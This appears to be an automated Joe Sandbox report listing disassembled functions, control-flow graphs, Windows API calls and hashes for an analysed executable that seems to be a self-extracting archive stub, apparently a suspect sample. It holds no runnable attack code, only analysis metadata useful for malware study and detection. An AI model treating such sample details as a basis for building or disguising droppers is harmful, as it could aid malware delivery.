                                                                                                                    • ShowWindow.USER32(00000000,00000005,?,?,?,00B9AF07,00000001,?,?,00B9B7B9,00BB506C,00BDFCB8,00BDFCB8,00001000,00000000,00000000), ref: 00B9D510
                                                                                                                    • SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 00B9D51B
                                                                                                                    • SendMessageW.USER32(00000000,000000C2,00000000,00BB35F4), ref: 00B9D529
                                                                                                                    • SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 00B9D53F
                                                                                                                    • SendMessageW.USER32(00000000,0000043A,00000000,?), ref: 00B9D559
                                                                                                                    • SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 00B9D59D
                                                                                                                    • SendMessageW.USER32(00000000,000000C2,00000000,?), ref: 00B9D5AB
                                                                                                                    • SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 00B9D5BA
                                                                                                                    • SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 00B9D5E1
                                                                                                                    • SendMessageW.USER32(00000000,000000C2,00000000,00BB43F4), ref: 00B9D5F0
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2115855430.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2115837421.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115880933.0000000000BB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BC5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2116015717.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_b80000_eP6sjvTqJa.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Message$Send$DialogDispatchItemPeekShowTranslateWindow
                                                                                                                    • String ID: \
                                                                                                                    • API String ID: 3569833718-2967466578
                                                                                                                    • Opcode ID: f38f2d7eeaa820aa20323fa539bef4b71eb19dbdf65b576e931ac80f6531298b
                                                                                                                    • Instruction ID: 2e971f224c5ffdf1bbbcc3c575dca39a25d67992f41853b01eeb787a834cb3c1
                                                                                                                    • Opcode Fuzzy Hash: f38f2d7eeaa820aa20323fa539bef4b71eb19dbdf65b576e931ac80f6531298b
                                                                                                                    • Instruction Fuzzy Hash: 8E31AF71145382ABE301DF209C8EFAB7FECEB96B04F000518F5519B2A2DF669A048776
                                                                                                                    Function 00B9D78F Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 184COMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 836 b9d78f-b9d7a7 call b9ec50 839 b9d9e8-b9d9f0 836->839 840 b9d7ad-b9d7b9 call ba3e13 836->840 840->839 843 b9d7bf-b9d7e7 call b9fff0 840->843 846 b9d7e9 843->846 847 b9d7f1-b9d7ff 843->847 846->847 848 b9d801-b9d804 847->848 849 b9d812-b9d818 847->849 850 b9d808-b9d80e 848->850 851 b9d85b-b9d85e 849->851 853 b9d810 850->853 854 b9d837-b9d844 850->854 851->850 852 b9d860-b9d866 851->852 855 b9d868-b9d86b 852->855 856 b9d86d-b9d86f 852->856 857 b9d822-b9d82c 853->857 858 b9d84a-b9d84e 854->858 859 b9d9c0-b9d9c2 854->859 855->856 860 b9d882-b9d898 call b8b92d 855->860 856->860 861 b9d871-b9d878 856->861 862 b9d81a-b9d820 857->862 863 b9d82e 857->863 864 b9d854-b9d859 858->864 865 b9d9c6 858->865 859->865 872 b9d89a-b9d8a7 call b91fbb 860->872 873 b9d8b1-b9d8bc call b8a231 860->873 861->860 866 b9d87a 861->866 862->857 868 b9d830-b9d833 862->868 863->854 864->851 869 b9d9cf 865->869 866->860 868->854 871 b9d9d6-b9d9d8 869->871 874 b9d9da-b9d9dc 871->874 875 b9d9e7 871->875 872->873 883 b9d8a9 872->883 881 b9d8d9-b9d8e6 ShellExecuteExW 873->881 882 b9d8be-b9d8d5 call b8b6c4 873->882 874->875 878 b9d9de-b9d9e1 ShowWindow 874->878 875->839 878->875 881->875 885 b9d8ec-b9d8f9 881->885 882->881 883->873 887 b9d8fb-b9d902 885->887 888 b9d90c-b9d90e 885->888 887->888 889 b9d904-b9d90a 887->889 890 b9d910-b9d919 888->890 891 b9d925-b9d944 call b9dc3b 888->891 889->888 892 b9d97b-b9d987 CloseHandle 889->892 890->891 899 b9d91b-b9d923 ShowWindow 890->899 891->892 904 b9d946-b9d94e 891->904 893 b9d989-b9d996 call b91fbb 892->893 894 b9d998-b9d9a6 892->894 893->869 893->894 894->871 898 b9d9a8-b9d9aa 894->898 898->871 903 b9d9ac-b9d9b2 898->903 899->891 903->871 905 b9d9b4-b9d9be 903->905 904->892 906 b9d950-b9d961 GetExitCodeProcess 904->906 905->871 906->892 907 b9d963-b9d96d 906->907 908 b9d96f 907->908 909 b9d974 907->909 908->909 909->892
                                                                                                                    APIs
                                                                                                                    • _wcslen.LIBCMT ref: 00B9D7AE
                                                                                                                    • ShellExecuteExW.SHELL32(?), ref: 00B9D8DE
                                                                                                                    • ShowWindow.USER32(?,00000000), ref: 00B9D91D
                                                                                                                    • GetExitCodeProcess.KERNEL32(?,?), ref: 00B9D959
                                                                                                                    • CloseHandle.KERNEL32(?), ref: 00B9D97F
                                                                                                                    • ShowWindow.USER32(?,00000001), ref: 00B9D9E1
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2115855430.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2115837421.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115880933.0000000000BB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BC5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2116015717.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_b80000_eP6sjvTqJa.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ShowWindow$CloseCodeExecuteExitHandleProcessShell_wcslen
                                                                                                                    • String ID: .exe$.inf
                                                                                                                    • API String ID: 36480843-3750412487
                                                                                                                    • Opcode ID: 5798a1eb048289096ed3f735d1e2f4b7cd57e42200808f0d2674c2ac1ec4337b
                                                                                                                    • Instruction ID: 65d3563aea651f63657e67d28a881390ed3274297bf738b5f7462b16ef59be2a
                                                                                                                    • Opcode Fuzzy Hash: 5798a1eb048289096ed3f735d1e2f4b7cd57e42200808f0d2674c2ac1ec4337b
                                                                                                                    • Instruction Fuzzy Hash: C951C7715083809ADF31AF26D894BBBBBE4EF45744F0408BEF5C5971A1EBB18984C762
                                                                                                                    Function 00BAA95B Relevance: 9.2, APIs: 6, Instructions: 216COMMONLIBRARYCODE
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 910 baa95b-baa974 911 baa98a-baa98f 910->911 912 baa976-baa986 call baef4c 910->912 914 baa99c-baa9c0 MultiByteToWideChar 911->914 915 baa991-baa999 911->915 912->911 919 baa988 912->919 917 baab53-baab66 call b9fbbc 914->917 918 baa9c6-baa9d2 914->918 915->914 920 baaa26 918->920 921 baa9d4-baa9e5 918->921 919->911 923 baaa28-baaa2a 920->923 924 baa9e7-baa9f6 call bb2010 921->924 925 baaa04-baaa15 call ba8e06 921->925 928 baab48 923->928 929 baaa30-baaa43 MultiByteToWideChar 923->929 924->928 938 baa9fc-baaa02 924->938 925->928 935 baaa1b 925->935 933 baab4a-baab51 call baabc3 928->933 929->928 932 baaa49-baaa5b call baaf6c 929->932 940 baaa60-baaa64 932->940 933->917 939 baaa21-baaa24 935->939 938->939 939->923 940->928 942 baaa6a-baaa71 940->942 943 baaaab-baaab7 942->943 944 baaa73-baaa78 942->944 945 baaab9-baaaca 943->945 946 baab03 943->946 944->933 947 baaa7e-baaa80 944->947 948 baaacc-baaadb call bb2010 945->948 949 baaae5-baaaf6 call ba8e06 945->949 950 baab05-baab07 946->950 947->928 951 baaa86-baaaa0 call baaf6c 947->951 955 baab41-baab47 call baabc3 948->955 964 baaadd-baaae3 948->964 949->955 966 baaaf8 949->966 954 baab09-baab22 call baaf6c 950->954 950->955 951->933 963 baaaa6 951->963 954->955 967 baab24-baab2b 954->967 955->928 963->928 968 baaafe-baab01 964->968 966->968 969 baab2d-baab2e 967->969 970 baab67-baab6d 967->970 968->950 971 baab2f-baab3f WideCharToMultiByte 969->971 970->971 971->955 972 baab6f-baab76 call baabc3 971->972 972->933
                                                                                                                    APIs
                                                                                                                    • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,00BA5695,00BA5695,?,?,?,00BAABAC,00000001,00000001,2DE85006), ref: 00BAA9B5
                                                                                                                    • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,00BAABAC,00000001,00000001,2DE85006,?,?,?), ref: 00BAAA3B
                                                                                                                    • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,2DE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 00BAAB35
                                                                                                                    • __freea.LIBCMT ref: 00BAAB42
                                                                                                                      • Part of subcall function 00BA8E06: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,00BACA2C,00000000,?,00BA6CBE,?,00000008,?,00BA91E0,?,?,?), ref: 00BA8E38
                                                                                                                    • __freea.LIBCMT ref: 00BAAB4B
                                                                                                                    • __freea.LIBCMT ref: 00BAAB70
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2115855430.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2115837421.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115880933.0000000000BB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BC5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2116015717.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_b80000_eP6sjvTqJa.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ByteCharMultiWide__freea$AllocateHeap
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1414292761-0
                                                                                                                    • Opcode ID: 360f52552db3243bdbefacd123833bfac295da827ec4a196d0f2f9a3709e7117
                                                                                                                    • Instruction ID: 743885e24d9e54f3c52db3168a4dd675c31886b8ea921fcfdd385e27280a58ba
                                                                                                                    • Opcode Fuzzy Hash: 360f52552db3243bdbefacd123833bfac295da827ec4a196d0f2f9a3709e7117
                                                                                                                    • Instruction Fuzzy Hash: CB51C072604216AFDB258F64CC82EBFB7EAEB46750F5546A8FC14E6150EB34DC40C6B2
                                                                                                                    Function 00BA3B72 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 63COMMONLIBRARYCODE
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 975 ba3b72-ba3b7c 976 ba3bee-ba3bf1 975->976 977 ba3b7e-ba3b8c 976->977 978 ba3bf3 976->978 980 ba3b8e-ba3b91 977->980 981 ba3b95-ba3bb1 LoadLibraryExW 977->981 979 ba3bf5-ba3bf9 978->979 982 ba3c09-ba3c0b 980->982 983 ba3b93 980->983 984 ba3bfa-ba3c00 981->984 985 ba3bb3-ba3bbc GetLastError 981->985 982->979 987 ba3beb 983->987 984->982 986 ba3c02-ba3c03 FreeLibrary 984->986 988 ba3bbe-ba3bd3 call ba6088 985->988 989 ba3be6-ba3be9 985->989 986->982 987->976 988->989 992 ba3bd5-ba3be4 LoadLibraryExW 988->992 989->987 992->984 992->989
                                                                                                                    APIs
                                                                                                                    • FreeLibrary.KERNEL32(00000000,?,?,?,00BA3C35,?,?,00BE2088,00000000,?,00BA3D60,00000004,InitializeCriticalSectionEx,00BB6394,InitializeCriticalSectionEx,00000000), ref: 00BA3C03
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2115855430.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2115837421.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115880933.0000000000BB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BC5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2116015717.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_b80000_eP6sjvTqJa.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: FreeLibrary
                                                                                                                    • String ID: api-ms-
                                                                                                                    • API String ID: 3664257935-2084034818
                                                                                                                    • Opcode ID: 183dfc2abd6041dd820aedd2fc27fd4aa202071a2184e4f09317405ea9619928
                                                                                                                    • Instruction ID: d5804d57ee7e44f2d568c0737d48e0b1428580ff172628efd3d17be7c3e6081f
                                                                                                                    • Opcode Fuzzy Hash: 183dfc2abd6041dd820aedd2fc27fd4aa202071a2184e4f09317405ea9619928
                                                                                                                    • Instruction Fuzzy Hash: 8811A731A49225ABCB218B589C8175D37E5DF03F70F650290F915EB190E771EF0086E1
                                                                                                                    Function 00B898E0 Relevance: 7.6, APIs: 5, Instructions: 111filetimeCOMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 993 b898e0-b89901 call b9ec50 996 b8990c 993->996 997 b89903-b89906 993->997 999 b8990e-b8991f 996->999 997->996 998 b89908-b8990a 997->998 998->999 1000 b89921 999->1000 1001 b89927-b89931 999->1001 1000->1001 1002 b89933 1001->1002 1003 b89936-b89943 call b86edb 1001->1003 1002->1003 1006 b8994b-b8996a CreateFileW 1003->1006 1007 b89945 1003->1007 1008 b899bb-b899bf 1006->1008 1009 b8996c-b8998e GetLastError call b8bb03 1006->1009 1007->1006 1011 b899c3-b899c6 1008->1011 1013 b899c8-b899cd 1009->1013 1015 b89990-b899b3 CreateFileW GetLastError 1009->1015 1011->1013 1014 b899d9-b899de 1011->1014 1013->1014 1016 b899cf 1013->1016 1017 b899ff-b89a10 1014->1017 1018 b899e0-b899e3 1014->1018 1015->1011 1022 b899b5-b899b9 1015->1022 1016->1014 1020 b89a2e-b89a39 1017->1020 1021 b89a12-b89a2a call b90602 1017->1021 1018->1017 1019 b899e5-b899f9 SetFileTime 1018->1019 1019->1017 1021->1020 1022->1011
                                                                                                                    APIs
                                                                                                                    • CreateFileW.KERNELBASE(?,?,?,00000000,00000003,08000000,00000000,?,00000000,?,?,00B87760,?,00000005,?,00000011), ref: 00B8995F
                                                                                                                    • GetLastError.KERNEL32(?,?,00B87760,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00B8996C
                                                                                                                    • CreateFileW.KERNEL32(00000000,?,?,00000000,00000003,08000000,00000000,?,?,00000800,?,?,00B87760,?,00000005,?), ref: 00B899A2
                                                                                                                    • GetLastError.KERNEL32(?,?,00B87760,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00B899AA
                                                                                                                    • SetFileTime.KERNEL32(00000000,00000000,000000FF,00000000,?,00B87760,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00B899F9
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2115855430.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2115837421.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115880933.0000000000BB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BC5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2116015717.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_b80000_eP6sjvTqJa.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: File$CreateErrorLast$Time
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1999340476-0
                                                                                                                    • Opcode ID: 7d8b3b37f0cc16c588e12e19e88f6d874d9960085bda59268b116d3944e63439
                                                                                                                    • Instruction ID: 7384a1db5b9715c335c0fa846b2f0f38d8d21973686403ee52d9e2b48138b5a1
                                                                                                                    • Opcode Fuzzy Hash: 7d8b3b37f0cc16c588e12e19e88f6d874d9960085bda59268b116d3944e63439
                                                                                                                    • Instruction Fuzzy Hash: 6F312330544745AFEB30AF24CC86BEABBD4FB44320F280B5DF9A5961E0D7B4A944CB91
                                                                                                                    Function 00B9B568 Relevance: 7.5, APIs: 5, Instructions: 38windowCOMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 1052 b9b568-b9b581 PeekMessageW 1053 b9b5bc-b9b5be 1052->1053 1054 b9b583-b9b597 GetMessageW 1052->1054 1055 b9b599-b9b5a6 IsDialogMessageW 1054->1055 1056 b9b5a8-b9b5b6 TranslateMessage DispatchMessageW 1054->1056 1055->1053 1055->1056 1056->1053
                                                                                                                    APIs
                                                                                                                    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00B9B579
                                                                                                                    • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00B9B58A
                                                                                                                    • IsDialogMessageW.USER32(0001040E,?), ref: 00B9B59E
                                                                                                                    • TranslateMessage.USER32(?), ref: 00B9B5AC
                                                                                                                    • DispatchMessageW.USER32(?), ref: 00B9B5B6
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2115855430.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2115837421.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115880933.0000000000BB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BC5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2116015717.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_b80000_eP6sjvTqJa.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Message$DialogDispatchPeekTranslate
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1266772231-0
                                                                                                                    • Opcode ID: 112e0ffa813e379d9df901a1437032146bfc93e3bc8b5eccfc29044f87156c38
                                                                                                                    • Instruction ID: c5666b52c9fbbb1f8ea8ce3a2f020798decc103e0b0880b7ed2aa8e02c324e7c
                                                                                                                    • Opcode Fuzzy Hash: 112e0ffa813e379d9df901a1437032146bfc93e3bc8b5eccfc29044f87156c38
                                                                                                                    • Instruction Fuzzy Hash: C0F0BD71A0116AAB8F209BE5AD8CEEB7FECEE057917404415B505D3011EF34D605CBB0
                                                                                                                    Function 00B9ABAB Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 35COMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 1057 b9abab-b9abca GetClassNameW 1058 b9abcc-b9abe1 call b91fbb 1057->1058 1059 b9abf2-b9abf4 1057->1059 1064 b9abf1 1058->1064 1065 b9abe3-b9abef FindWindowExW 1058->1065 1060 b9abff-b9ac01 1059->1060 1061 b9abf6-b9abf9 SHAutoComplete 1059->1061 1061->1060 1064->1059 1065->1064
                                                                                                                    APIs
                                                                                                                    • GetClassNameW.USER32(?,?,00000050), ref: 00B9ABC2
                                                                                                                    • SHAutoComplete.SHLWAPI(?,00000010), ref: 00B9ABF9
                                                                                                                      • Part of subcall function 00B91FBB: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00011FBB,00B8C116,00000000,.exe,?,?,00000800,?,?,?,00B98E3C), ref: 00B91FD1
                                                                                                                    • FindWindowExW.USER32(?,00000000,EDIT,00000000), ref: 00B9ABE9
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2115855430.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2115837421.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115880933.0000000000BB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BC5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2116015717.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_b80000_eP6sjvTqJa.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AutoClassCompareCompleteFindNameStringWindow
                                                                                                                    • String ID: EDIT
                                                                                                                    • API String ID: 4243998846-3080729518
                                                                                                                    • Opcode ID: ad29663de267906daeaa40b2cbd690da31ae7909dd97293e9e7bbedb1ba34029
                                                                                                                    • Instruction ID: 4bcc910327c8494c15a144dabaf6acf16cdb58e69d642921e1448b23ba5461e3
                                                                                                                    • Opcode Fuzzy Hash: ad29663de267906daeaa40b2cbd690da31ae7909dd97293e9e7bbedb1ba34029
                                                                                                                    • Instruction Fuzzy Hash: 42F0823260022977DF20A6259C49FEB76EC9B46F40F4840A1BA05A7181DB60EE4185F6
                                                                                                                    Function 00B9AC16 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 34comCOMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00B9081B: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00B90836
                                                                                                                      • Part of subcall function 00B9081B: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,00B8F2D8,Crypt32.dll,00000000,00B8F35C,?,?,00B8F33E,?,?,?), ref: 00B90858
                                                                                                                    • OleInitialize.OLE32(00000000), ref: 00B9AC2F
                                                                                                                    • GdiplusStartup.GDIPLUS(?,?,00000000), ref: 00B9AC66
                                                                                                                    • SHGetMalloc.SHELL32(00BC8438), ref: 00B9AC70
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2115855430.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2115837421.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115880933.0000000000BB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BC5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2116015717.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_b80000_eP6sjvTqJa.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: DirectoryGdiplusInitializeLibraryLoadMallocStartupSystem
                                                                                                                    • String ID: riched20.dll
                                                                                                                    • API String ID: 3498096277-3360196438
                                                                                                                    • Opcode ID: ae144e20c4c070f28f7b9a2a0ae550798b17073f6876c427554b1b00b7004dc1
                                                                                                                    • Instruction ID: 4d658cd028efc00d47fcd41722ac9da26ad9378ad6c1f68d36da0baa08da6e2a
                                                                                                                    • Opcode Fuzzy Hash: ae144e20c4c070f28f7b9a2a0ae550798b17073f6876c427554b1b00b7004dc1
                                                                                                                    • Instruction Fuzzy Hash: CDF0FFB1900249ABCB10AFA9D889AEFFBFCEF94700F00415AA415A3251DBB456058BA1
                                                                                                                    Function 00B9DBDE Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 31COMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 1070 b9dbde-b9dc09 call b9ec50 SetEnvironmentVariableW call b90371 1074 b9dc0e-b9dc12 1070->1074 1075 b9dc14-b9dc18 1074->1075 1076 b9dc36-b9dc38 1074->1076 1077 b9dc21-b9dc28 call b9048d 1075->1077 1080 b9dc1a-b9dc20 1077->1080 1081 b9dc2a-b9dc30 SetEnvironmentVariableW 1077->1081 1080->1077 1081->1076
                                                                                                                    APIs
                                                                                                                    • SetEnvironmentVariableW.KERNELBASE(sfxcmd,?), ref: 00B9DBF4
                                                                                                                    • SetEnvironmentVariableW.KERNEL32(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 00B9DC30
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2115855430.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2115837421.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115880933.0000000000BB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BC5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2116015717.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_b80000_eP6sjvTqJa.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: EnvironmentVariable
                                                                                                                    • String ID: sfxcmd$sfxpar
                                                                                                                    • API String ID: 1431749950-3493335439
                                                                                                                    • Opcode ID: 9beeee3d0990179d0a7426df93cfff857494f4098e08a9e941d292d72065c1b2
                                                                                                                    • Instruction ID: b1610745f2717d8ee4dce82502dc651ab38d567e5c5ba397fc5bdd520917050c
                                                                                                                    • Opcode Fuzzy Hash: 9beeee3d0990179d0a7426df93cfff857494f4098e08a9e941d292d72065c1b2
